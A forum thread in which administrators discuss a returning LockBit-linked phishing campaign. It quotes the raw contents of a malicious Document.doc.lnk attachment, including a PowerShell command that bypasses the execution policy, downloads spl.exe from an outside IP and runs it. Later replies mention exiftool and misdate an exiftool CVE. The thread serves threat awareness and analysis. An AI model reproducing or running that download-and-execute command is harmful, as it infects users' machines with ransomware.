Ransomeware mail campaign from May 2024 is active again
My server is getting blasted with tons of messages as described at the following site (and many others) with Jenny@gsd.com and an attached document:
https://www.msspalert.com/news/lockbit-black-ransomware-campaign-spraying-millions-of-messages
The contents of the document in one email looks like this:
cat Document/Document.doc.lnk
L�F� r��tg��oH��}�a��tg���5P�O� �:i�+00�/C:\V1�[G�Windows@ ヌOwH$\L�.Y��:WindowsZ1$\jSystem32B ヌOwH$\��.U�WֲSystem32V2��X�� cmd.exe@ ᄊX��$\��.jg�4�cmd.exeJ-Im4/FC:\Windows\System32\cmd.exe!..\..\..\Windows\System32\cmd.exe�/c powershell.exe ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://178.16.54.109/spl.exe','%userprofile%\windrv.exe');Start-Process '%userprofile%\windrv.exe'
shell32.dll�%windir%\System32\cmd.exe%windir%\System32\cmd.exe�%�
�wN��]N�D.��Q���`�Xdesktop-4mksc1r~N8��jEJ�s@d����u^Y��'�
~N8��jEJ�s@d����u^Y��'�
� ��1SPS��XF�L8C���&�m�m-S-1-5-21-711635060-3631344071-1154681243-50091SPS�mD��pH�H@.�=x�hHN�!"0 Yep just got hundreds of those emails today. They all point to 178.16.54.109 but spl.exe 404's so it looks like the abused hosting provider has already squashed this malware campaign out. Bummer, I would've loved to analyze this spl.exe encryptor and maybe also troll the attacker Also fyi, somehow, exiftool supports .lnk files so you can read the full command of the lnk cleanly with that. Good idea, I wasn't aware of exiftool, thanks for the suggestion. Although it apparently had a bad vulnerability in 2024 CVE-2021-22204 which if I'm reading it right, would mean, just reading a hacked file with it could mean remote code execution.